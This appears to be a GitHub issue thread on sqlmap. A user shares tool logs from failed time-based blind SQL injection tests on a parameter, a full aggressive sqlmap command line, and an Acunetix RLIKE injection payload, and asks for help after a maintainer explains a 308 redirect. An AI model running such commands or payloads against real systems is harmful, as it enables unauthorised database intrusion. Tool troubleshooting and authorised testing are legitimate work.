stamparm
commented
3 years ago 308 (Permanent Redirect) means that you are most probably targeting URL which has been move (permanently). Something is different in the URL you are trying to use and the one expected by the target (e.g. different path or smth). Try to access it via browser to see what's going on.
[02:40:40] [INFO] parsing HTTP request from 'inje' [02:40:40] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows; U; Windows NT 5.1; uk; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
[02:40:41] [WARNING] it appears that you have provided tainted parameter values ('a=paidout'') with most likely leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly are you really sure that you want to continue (sqlmap could have problems)? [y/N] y [02:40:47] [INFO] flushing session file [02:40:47] [INFO] testing connection to the target URL [02:40:48] [WARNING] the web server responded with an HTTP error code (308) which could interfere with the results of the tests [02:40:48] [INFO] checking if the target is protected by some kind of WAF/IPS [02:40:49] [WARNING] heuristic (basic) test shows that POST parameter 'a' might not be injectable [02:40:49] [INFO] testing for SQL injection on POST parameter 'a' [02:40:49] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind' [02:40:49] [WARNING] time-based comparison requires larger statistical model, please wait............................ (done)
[02:41:01] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (comment)' [02:41:15] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)' [02:41:37] [INFO] POST parameter 'a' appears to be 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)' injectable [02:41:37] [INFO] checking if the injection point on POST parameter 'a' is a false positive [02:41:37] [WARNING] false positive or unexploitable injection point detected [02:41:37] [WARNING] POST parameter 'a' does not seem to be injectable [02:41:38] [WARNING] heuristic (basic) test shows that GET parameter 'a' might not be injectable [02:41:40] [INFO] testing for SQL injection on GET parameter 'a' [02:41:41] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind' [02:42:03] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (comment)' [02:42:10] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)' [02:42:21] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)' [02:42:40] [WARNING] GET parameter 'a' does not seem to be injectable [02:42:40] [CRITICAL] all tested parameters do not appear to be injectable. Rerun without providing the option '--technique'. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') [02:42:40] [WARNING] HTTP error codes detected during run: 308 (Permanent Redirect) - 335 times
sqlmap -r inje --flush-session --random-agent --level 5 --risk 3 --technique=T --time-sec=2 -p a --test-filter=RLIKE
P.s: I tried other techniques/tamper ... acunetix throws: URL encoded GET input a was set to paidout' RLIKE (SELECT (CASE WHEN (1+1-2+00076=2+2-4+00076) THEN 1 ELSE 0x28 END)) -- Please help 🥺